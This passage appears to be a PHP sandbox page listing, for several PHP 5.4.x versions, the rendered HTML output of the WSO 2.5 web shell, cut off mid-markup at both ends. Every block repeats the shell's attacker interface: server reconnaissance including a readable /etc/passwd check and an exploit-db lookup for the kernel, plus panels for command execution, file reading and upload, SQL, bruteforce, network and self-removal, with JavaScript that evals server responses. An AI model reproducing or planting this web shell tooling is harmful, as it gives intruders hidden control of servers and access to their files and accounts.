<a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.16 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.15
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.15 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.14
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.14 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.13
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.13 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.12
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.12 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th 